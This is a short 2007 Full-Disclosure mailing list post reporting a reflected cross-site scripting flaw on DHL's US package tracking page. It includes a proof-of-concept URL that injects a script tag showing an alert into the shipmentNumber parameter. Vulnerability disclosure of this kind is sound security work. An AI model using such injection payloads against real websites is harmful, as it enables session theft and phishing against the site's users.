[Full-disclosure] XSS @ DHL
Static Rez
staticrez at gmail.com
Mon Dec 24 21:48:17 GMT 2007
I know these XSS vulns are kind of easy to find and they usually come off as
"so easy a monkey could do it", but I thought I'd throw this one out
there...
http://track.dhl-usa.com//atrknav.asp?shipmentNumber=<script>alert('test')</script>
sincerely,
a monkey.
Full-Disclosure is hosted and sponsored by Secunia.